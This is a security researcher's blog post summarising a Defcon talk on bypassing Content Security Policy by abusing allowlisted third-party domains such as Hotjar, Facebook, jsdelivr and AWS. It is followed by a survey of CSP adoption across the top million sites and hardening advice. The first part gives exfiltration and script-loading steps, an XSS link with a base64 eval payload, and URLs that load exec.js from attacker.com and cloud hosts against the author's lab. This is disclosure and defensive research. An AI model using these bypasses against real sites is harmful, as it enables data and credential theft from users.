TL;DR
This post is a summary of the contents of my talk in Defcon 31 AppSec Village last August 2023, and part of what I will explain in Canada at the SecTor conference on the 24th of October 2023 at 4:00 PM.
There are two (big) blocks in this post. Sorry for the length <(_ _)>:
- The first part is about the not so well-known CSP bypasses that I found during this research. These can be of use in your next pentest, bug bounty, etc. Have a look at the 8 third-party domains that can be abused to bypass a strict policy to execute that sweet Cross-Site Scripting (XSS) or clickjacking proof of concept that was initially being blocked.
- The second part takes a step back and delves into the process of getting Content-Securiy-Policy (CSP) data from top 1 million sites and the conclusions I draw from it. After reading this part you will get a sense of how widespread and well-implemented CSP is across the Internet. You will also learn the common pitfalls people fall into when implementing the policy. The tool I wrote to scan and collect this information and review the results can be found in https://github.com/sensepost/dresscode
Index
Context
Last year I was working on a web application assessment, one of these assessments that are repeated every year in which the analyst has to face a hardened application. Therefore, every year, the report gets smaller and smaller when we look at the number of vulnerabilities.
By reading the previous year’s assessment report I spotted a nice stored XSS. When I went to replicate it, I found a relatively stringent Content Security Policy (CSP), which contained the directive “script-src” allowing only “nonced” scripts. This policy prevented me from exploiting the same stored XSS. I also found many other XSS vectors within the page, but all of them were prevented by the CSP policy. I was sad.
After recovering from the down, I thought I should find a way to bypass their CSP. Long story short, I found a way by injecting my own JavaScript code into a legitimate eval function used within an allowed script (one that had the adequate nonce). In addition to that I was able to exploit other reflected XSS vectors to carry out a UI Redressing attack to mimic a login panel and exfiltrate harvested credentials to www.google-analytics.com.
From that moment I became obsessed with finding new ways to bypass CSP that were not so well documented or known out there. It is not my intention to explain the two previous vulnerabilities here, but instead to show the results of the subsequent research on CSP.
The outcome of that research was twofold:
- To find new ways to bypass CSP which I can add to my toolbox for future assessments.
- To obtain a better view of the health status of CSP across the Internet.
So, lets dive into each topic separately, let’s start with the more practical section, the bypasses:
1 – Bypasses
You will be able to see the current health status of CSP accross Internet in the section #2, but for the practical folks, here are the bypasses I found during the research.
Disclaimer: I found a lot of information out there to bypass CSP by using JSON with padding (JSONP) and loading outdated AngularJS libraries (e.g. here, here and here), but I wanted to explore new ways to bypass the policies.
I found six new third-parties to abuse to bypass CSP controls and two additional ones that were being exploited in bug bounty programs and publicly talked about, but not very well known.
Regarding the six new vectors, I was not able to easily find public information describing how to use them to bypass CSP. Nevertheless, I think the eight of them deserve to be more popularised, so as a pentester, you can use them in your future assessments or bug bounties, and as a defender or developer, you can avoid them when defining your site’s CSP.
Here’s the list of third parties that I found you can easily abuse when you find them in a CSP, some of them will be useful to exfiltrate data from the target site when found in directives such as “connect-src“, and some others to execute code when found in directives such as “script-src“:
# | Entity | Allowed Domain | Capabilities | Publicly Documented | Number of Sites |
1 | www.facebook.com, *.facebook.com | Exfil | No | 7310 | |
2 | Hotjar | *.hotjar.com, ask.hotjar.io | Exfil | No | 2824 |
3 | Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec | Yes | 2208 |
4 | Amazon CloudFront | *.cloudfront.net | Exfil, Exec | No | 1441 |
5 | Amazon AWS | *.amazonaws.com | Exfil, Exec | No | 860 |
6 | Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec | No | 90 |
7 | Salesforce Heroku | *.herokuapp.com | Exfil, Exec | No | 25 |
8 | Google Firebase | *.firebaseapp.com | Exfil, Exec | Yes | 19 |
In the last column, you can see the number of sites that I found within the top 1 million where the “Allowed Domain” was present in their CSP. I have ignored www.google-analytics.com on purpose here, as we already had a lot of information out there to bypass CSP using Google Analytics (e.g. here and here) and I wanted to explore new vectors.
Please, do not take this as a comprehensive list of third-party domains that can be abused to bypass CSP, there might be others out there that I haven’t tested, therefore, don’t consider your CSP 100% secure if you don’t have these domains in your CSP. Always be cautions about what third party domains you trust within your CSP.
Lab Environment
To demonstrate the bypasses, I could have used any site found on my database, but I prefer not to go to jail just for some dummy demos, so I created a lab to demonstrate potential impact of the bypasses. The lab is a site, called Keyfc, where you can login and access a private page:
The private page will have the secret ingredient of the Keyfc recipe:
It also has a section to change your profile data, such as email, password or security questions and answers:
I added two vulnerabilities to this page. The first one (vulnerability #1) is present in the file secret.php:
You can see that whatever you pass to the parameter “msg” will be injected within the allowed script. So, if you visit the following URL, you will get the following HTML code in response:
The second vulnerability (vulnerability #2) will be found in the same page “secret.php” and it will just include in the DOM a new script with its source pointing to the URL passed through the parameter “source”:
So, if we try to load a script controlled by an attacker by visiting the following URL:
https://<site>/secret.php?source=https://attacker.com/exec.js
The script “exec.js” hosted in the attacker’s controlled domain would be executed. Of course, if the CSP has an allowlist within the “script-src” and the domain “attacker.com” is not there, the script will never be executed and we would get the following error in the console of our browser/agent:
Refused to load the script 'https://attacker.com/exec.js' because it violates the following Content Security Policy directive: "script-src [...]". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback.
So, let’s find ways to bypass this restriction.
Proof of Concepts
The following sections will explain the process of bypassing CSP through third party abuse.
Abuse #1 – Hotjar
This one allows an attacker to exfiltrate data, pretty much as we would do with the classical www.google-analytics.com exfiltration. An example CSP vulnerable to this would be the following:
default-src 'self' ask.hotjar.io *.hotjar.com;?
script-src 'nonce-zM1mRhUyMJ13LFoja7kkF2pH' *.hotjar.com;
[...]
For exfiltration purposes, instead of the “default-src”, we could work with a CSP that specified “connect-src” directive as well.
As an attacker, if we wanted to exfiltrate the security question and answer of a target user, we would not be able to exfiltrate to a random domain, so we would need to use Hotjar for that purpose. For that, we follow these general steps (have in mind this is just one example, but there could be many other ways to exfiltrate to Hotjar):
- Open an account in Hotjar
- Create a poll to insert in the attacker’s controlled site
- Sniff your HTTP traffic and answer the poll
- Mimic that “poll answer” in the victim-side
- Obtain the “poll answer” in your attacker’s hotjar dashboard.
This is the code to exfiltrate to Hotjar that we need to execute on the victim’s agent:
If we encode the previous PoC to Base64 and take advantage of the vulnerability #1 (XSS) present in the page “secret.php” of the target page, we would end up with a link similar to this one:
https://hotjar.keyfc.xyz/secret.php?msg=hello%22;eval(atob(%22ZmV0Y2[...]bGUucGIGk7Cn0pOwo%3d%22));//
If we make the victim click on this link or a shortened version of it (via bit.ly or any other URL shortener service) we will have the security question and answer exfiltrated to our Hotjar dashboard:
Abuse #2 – Facebook
This one allows an attacker to exfiltrate data to a Facebook developer dashboard. I found more than 7K sites in my DB that allowed “www.facebook.com” or “*.facebook.com” in the CSP directive.
To put this finding in perspective, the “golden standard” to exfiltrate data bypassing CSP could be considered “Google Analytics“, for which, there are a lot of blog posts and articles describing how to do it (e.g. here and here). For this case, I found 6K sites in my DB allowing “google-analytics.com” in their CSP. Despite the similar prevalence of both technologies, it is interesting how exfiltrating data with Facebook is not very well known and, up to my knowledge, no public blog posts describing this can be found on the Internet.
An example CSP vulnerable to this would be the following:
default-src 'self' www.facebook.com; script-src 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' *.facebook.net; [...]
In this case, if an attacker wanted to exfiltrate the secret ingredient from the target page, the general process would be the following (heads-up, this is not a detailed step by step):
- Create a Facebook Developer account here.
- Create a new “Facebook Login” app and select “Website”.
- Go to “Settings -> Basic” and get your “App ID”
- In the target site you want to exfiltrate data from, you can exfiltrate data by directly using the Facebook SDK gadget “fbq” through a “customEvent” and the data payload.
- Go to your App “Event Manager” and select the application you created (note the event manager could be found in an URL similar to this: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
- Select the tab “Test Events” to see the events being sent out by “your” web site.
This is the code we want to execute on the victim’s browser:
The first line would initialise the Facebook tracking pixel to point to the attacker’s controlled account. The second line would exfiltrate the secret ingredient as a custom event generated in the page.
If, by any way, we manage to execute that code in the victim’s browser, we will see the following in our Facebook Developer account event manager:
Abuse #3 – JS Delivr
In this case, using jsdelivr we would be able to execute code.
I have found this method already being reported on some HackerOne reports, so I’m not claiming this one is originally discovered here, but I think the method is not really well-known, so let’s spread awareness on this one a bit more.
This is a sample CSP that can be bypassed:
default-src 'self'; script-src 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' cdn.jsdelivr.net; [...]
Assuming our objective now is to change the victim user password and security answer, we can use the following payload:
The general steps to follow to execute this payload on the target site that allows cdn.jsdelivr.net would be the following:
- Upload your payload to a new repository in GitHub or npm.
- Ask jsdelivr.com nicely to cache your code by following a very specific URL pattern like this:
- Github: https://cdn.jsdelivr.net/gh/user/repo@version/file
- NPM: https://cdn.jsdelivr.net/npm/package@version/file
- Exploit vulnerability #2 by sending the allowed cached script in cdn.jsdelivr.net.
Now, to exploit vulnerability #2 in our lab, we just need to send the following link to the victim and hope they click it:
https://jsdelivr.keyfc.com/secret.php?source=https://cdn.jsdelivr.net/gh/felmoltor/bunchofjs/exec.js
If the victim clicks on it, the code in “exec.js” will be executed and the password and security answer will be changed:
Abuse #4 – Amazon AWS
Using Amazon AWS we would be able to exfiltrate data, but I am confident that it can also be used to execute code. This is a sample CSP that can be bypassed:
default-src 'self'; script-src 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' *.amazonaws.com; [...]
We need to create two components in our Amazon AWS account:
- An API Gateway that will be public as a subdomain of amazonaws.com
- A Lambda function to decode the exfiltrated data coming from the API Gateway as a parameter
The code to execute on the victim’s browser and the Lambda function code is the following:
If we get that code executed on the victim’s browser, we will have the following in the attacker’s CloudWatch logs:
Abuses #5, #6, #7, and #8
I don’t want to make this post longer than it already is, so the other four PoCs are briefly mentioned here. It covers the following four third-party providers:
- Azure AppServices and Static Webapps (~100 sites in the DB)
- Amazon Cloudfront (~100 sites)
- Salesforce Heroku (~18 sites)
- Google Firebase (~15 sites)
These four third-party services were not found frequently in the top 1 million sites database, but you never know when you will find them on your next pentest or bug bounty, so they might be useful to you.
Due to the similarity to the PoC #4, you need just to be aware that the general approach to each of them would be the same:
- Register an account with the third party
- Follow their guidelines to setup a web application or hosting a project with them, e.g.:
- Azure AppServices and Static Webapps
- Amazon Cloudfront
- Heroku Hosting
- Firebase Hosting
- Upload the attacker payloads to these projects
- Take advantage of the hole in the CSP that allows these third-party domains. For example, to exploit the vulnerability #2 of the laboratory you send the following links to the victim:
- https://cloudfront.keyfc.com/secret.php?source=https://d15xoolnwhr08.cloudfront.net/js/exec.js
- https://azure.keyfc.com/secret.php?source=https://nice-dune-08c8da410.3.azurestaticapps.net/exec.js
- https://heroku.keyfc.com/secret.php?source=https://exfiltest-75310ac89c2a.herokuapp.com/exec.js
- https://firebase.keyfc.com/secret.php?source=https://demo-defcon.firebaseapp.com/exec.js
2 – CSP Health Status
Note: I am assuming you have previous knowledge of what CSP is and what this security mechanism is. Otherwise, refer to the Mozilla site for more information.
To obtain a better view of the state of CSP on the Internet, I needed to gather the HTTP headers myself, explore them, parse the CSP information out from these and reach some conclusions. So I decided to retrieve this information from the top 1 million sites on the Internet (In this case: Majestic Million and Cisco Umbrella). For this to work I needed to program something scalable that could scan all those web sites in a reasonable amount of time.
The Architecture
I needed to make some architectural decisions here, such as what database to store the scrapped data into and the programming paradigm to do the scans and parsing of data.
Regarding the database, I started with a SQLite3 database, jumped later to MySQL in various forms and finally moved to MongoDB. To help me make a decision on which one of them to use, I draw a chart of the time taken to process and introduce 10.000 entries with HTTP header data.
The orange line, which represented MongoDB, was clearly the winner in this contest:
Ok, so now that I have decided what database to use, let’s jump into comparing the different programming paradigms.
I wanted to compare a classical for loop requesting the headers sequentially with the python library “requests” with an asynchronous programming approach using the python library “aiohttp“.
I like charts, so let’s compare each approach. Here is the time taken to poll the headers of 500 web sites with both the sequential and asynchronous approach. The blue bar is the sequential approach, which took 26 minutes, and the orange bar represents the asynchronous approach, which took 2:14 minutes.
This allowed me to reduce the time taken to scan the top 1 million sites form ~32 days to ~3 days. You can take a look at the asyncronous code here.
Good! Time goes down, stonks go up.
In summary, the architecture of the solution would look like this: a jumpbox scanning the sites using aiohttp, managing the datasets with the pandas library, then storing the information in a MongoDB, and finally, tapping into this information through a Dashboard programmed with python Dash and Plotly express:
Away with the efficiency comparison now. Lets dig into the ingestion process of the data.
- Collect headers from the top 1 million sites chosen (Majestic million and Cisco Umbrella).
- Parse the CSP information from the headers.
- Asign the document a country (first by ccTLD, then by IP address geolocation or by WHOIS information)
- Spot weaknesses and potential bypasses (see the first section)
Dashboard – CSP Health Status
From the Dashboard we can obtain interesting information, such as the percentage of sites using CSP, which disappointingly does not reach to a 10%:
If we are to make a bit of self-criticism in the security industry, I would say that we are not doing our job. I would compare this situation to the commercial where 9 out of 10 dentists recommend you to brush your teeth, but its the opposite: 9 out of 10 dentists are not brushing their teeth or encouraging their clients to do so:
Jokes aside, luckily, there’s a positive side of it. The most popular sites are implementing CSP more frequently than the less popular sites, as it can be observed in the following chart:
The previous chart shows the percentage of CSP usage if we sort the sites by popularity and then take the top 1000, top 10000, and top 100000.
We can also explore other information from the dashboard, such as the most used CSP directives:
We can observe how the most popular of this list are “upgrade-insecure-requests” and “frame-ancestors“, followed by many other *-src directives. This is understandable from the point of view of a website administrator; the less complicated directives to setup are those two, you don’t need to allowlist anything or to maintain the allowlist, as “upgrade-insecure-requests” is used by itself, without any other value, and the immense majority of “frame-ancestors” values are configured with “self” or “none”.
The five least frequently configured directives (and the CSP level where those directives are available) are:
- object-src (L1)
- media-src (L1)
- worker-src (L3)
- base-uri (L2)
- report-uri (L1 – Deprecated in favor of report-to)
Clearly, those are not used enough despite the positive impact they can have on the security of your website. Probably due to the lack of understanding what these directives are protecting us against (more on that later).
In the dashboard, we can take a look to the specific values configured for each CSP directive. Due to its importance, we will use “script-src” as an example for this:
We can observe that the most frequent directive values used are “unsafe-inline” and “unsafe-eval“. Looking from the percentage perspective:
- Presence of “unsafe-inline”:
- Relative to sites with CSP headers: 21,898/124,098 = 17%
- Relative to sites defining a “script-src”: 21,898/24,793 = 88%
- Presence of “unsafe-eval”:
- Relative to sites with CSP headers: 19,931/124,098 = 16%
- Relative to sites defining a “script-src”: 19,931/24,793 = 80%
If we come back to the previous dentist analogy, not only is there one single dentist out of ten that brushes their teeth (implements CSP and defines a “script-src”), but rather that dentist brushes their teeth with sugar 6 days per week:
Moving on to another topic in the Dashboard. I tried to count the average number of weaknesses per country, just for a bit of fun:
That intense red colour corresponds to an average count of eight weaknesses per country. No clear winner or medals for anyone here, sorry.
Now lets talk a bit about the weaknesses, we can take a look at the most frequent ones detected:
Topping the list we have the lack of “report-to” directives, with 116,991 times this weakness was detected. Keeping in mind that the number of sites with CSP headers is 124,098, this makes this weakness to be present in 94% of the sites with CSP headers. This indicates that most of the sites implementing CSP are currently not actively monitoring potential attacks in real time with this directive (95 of these sites, a 0.08%, were using the deprecated “report-uri” directive instead).
It is also very interesting to see that the most updated directive “report-to”, does not even appear in the list of the 18 most used directives, but its old and its deprecated cousin “report-uri” does appear.
This might be due to the problem brought to my attention during my Defcon 31 AppSec talk, where naugtur let me know that enabling this directive could potentially lead to a high volume of traffic generated. This could potentially produce a DDoS scenario. Imagine what would happen when a highly-popular site forgets to allowlist their Google Analytics domain on their CSP, as described by Scott Helme here. A way to prevent this scenario would be to use third-party solutions, such as Cloudflare, report-uri.io, which externalise the volumetric problem, or implement your own report-to endpoint having this in mind (one example csp-report-lite).
Another possible reason is that “report-to” directive is not yet supported by all major browsers. Specifically, Firefox and Safari do not support it yet, whereas “report-uri” is supported by all major browsers:
Following on in that list is the “base-uri“, which is not defined in 116,794 of the sites. This is another shocking 94% of the sites defining CSP but not using that feature.
This might be due to the lack of clear understanding of what is this directive protecting you against. In this case, against injections changing the <base> HTML tag to arbitrary attacker’s domains. One good example of such attacks is this Gitlab vulnerability disclosed in HackerOne in 2022 (or here and here).
So, remember to make a wish if you come across a CSP with those two directives:
Let’s focus our attention now to the less frequent weaknesses detected:
We will look at “Third Party Abuse”.
It is found in 11,349 sites, which is a ~9% of the sites implementing CSP. This means, that 9% of the sites contain a weakness that potentially can allow an attacker to bypass the policy by abusing the third-party trust.
Regarding the last item of the list: “Lenient Scheme“. We find this weakness present in 9,267 sites, which is ~7% of the sites defining CSP. That is, the sites defining a CSP that allows a protocol handler such as “https:” or “http:” within a directive. This means that all resources loaded from a source coming from an “https” channel would be happily allowed. Depending on the directive this source is located in, the impact would be different (e.g. for script-src ‘https:’ all scripts coming from an https will be allowed to be executed within the page context. For connect-src ‘https:’, all outbound connections to an https destination will be allowed).
These may look like small percentages, but think about it as almost 1 in every 10 sites that have defined a CSP and expect to have protection against XSS and similar injections, can be bypassed by abusing one of their third-party domains allowed in the policy or by providing a resource coming from an “https:” source. This is a lot of sites that pile onto the ~90% of total sites that do not define CSP and the ~17% of sites defining CSP but allowing “unsafe-inline” and “unsafe-eval”.
Finally, there is a section in the dashboard where the specific weaknesses can be observed listed in a table form. Some of the weakness that you can query are:
- Third Party Abuse
- Orphan Domains
- Unsafe Eval
- Unsafe Inline
- No CSP Defined
- Only CSP-Report-Only Defined
- etc.
One weakness of that list that we have not yet talked about is the “Orphan Domains”. In this case, the CSP defined a directive allowing a particular domain as a source, such as script-src subdomain.mydomain.com. In the case that mydomain.com is potentially not registered (i.e. we get an NXDOMAIN response from the DNS and Whois do not return any results for this domain), we can consider the CSP is bypasseable: it only requires you to register “mydomain.com” and now you can execute script on the target domain.
The dashboard can show us the domains affected by this in the “Weakness” section:
Conclusions
We have looked at the current status of CSP in Internet in the second section.
~17% of sites had the “unsafe-inline” value in their CSP and ~16% had the “unsafe-eval” value.
Other unsafe settings, such as having orphan domains allowed in their policy or lenient handlers, allowing any source or connect destination as long as it conformed to the http: or https: schemes, were also found.
It is undeniable that CSP brings effective protection to many sites on the Internet and the standard is still alive and well, with the Level 3 of the standard currently in Working Draft. Which is good news, as it will bring more control and granularity over what content can be executed on the sites.
But, sadly, when we look at the usage level, the current status of CSP is not the best across the Internet.
We have been living with CSP for a long time (the first level of the policy was approved in 2012, almost 11 years ago), and we are not implementing it broadly. It barely reaches a 30% presence in the top 1000 sites of Internet, but when we increase the scope of the study to a larger set of sites, the percentage drops to a mere 10%.
I’m not advocating for 100% use of CSP, as there will be static sites with a reduced attack surface where the benefit of implementing it would be minimal when compared to the risk of the page being exposed. But a 10% presence of this useful security feature seems to be a really low number from all perspectives.
In the first section, we looked at six new vectors to bypass CSP and two that I have found on HackerOne reports, but were not so well-known, as I could not find blog posts or challenges explaining them in detail.
Approximately 9% of the sites defining a CSP contained one of the eight instances of “Third-Party Abuse” described here.
This indicates that 1 in every 11 sites can potentially have their CSP bypassed due to the blind trust in third-parties.
This, in conjunction with the previous unsafe settings described before, makes me think that despite the good mechanism that CSP is, its complexity and the effort required for its maintenance is making people not implement it.
To counteract this, the security community and developers need to be clear about the benefits of implementing a CSP and advocate for its safe implementation. For that I have some recommendations.
Recommendations
- Implement CSP. Despite all the bypasses explained here, it does not mean it is not worth it. It can be an excellent tool to deter attackers and reduce the attack surface your clients and users are exposed to when navigating your web site.
- Use Subresource Integrity (SRI) in conjunction with CSP.
- When possible, try not to use the “unsafe-inline” and “unsafe-eval” values. Migrate to strict policies with “nonce” and “hash” directives.
- Use “strict-dynamic” to reduce operational load if that helps your company adopting strict Content Security Policies, but be aware that it gives allowed scripts the capability to include additional scripts.
- Reduce allowed third-party domains in your CSP to a minimum. Instead, host the libraries on your own domain where possible.
- If third-party domains are required in your CSP, do not add them with wildcards (e.g. *.amazonaws.com).
- If you have enough bandwidth and capabilities, use report-to with report-sample to observe in real time what is happening on your user’s browsers, including potential attacks to them, via your web site.
- Consider using commercial solutions to monitor client-side JavaScript (hint: Search for “client-side protection javascript formjacking” in Google).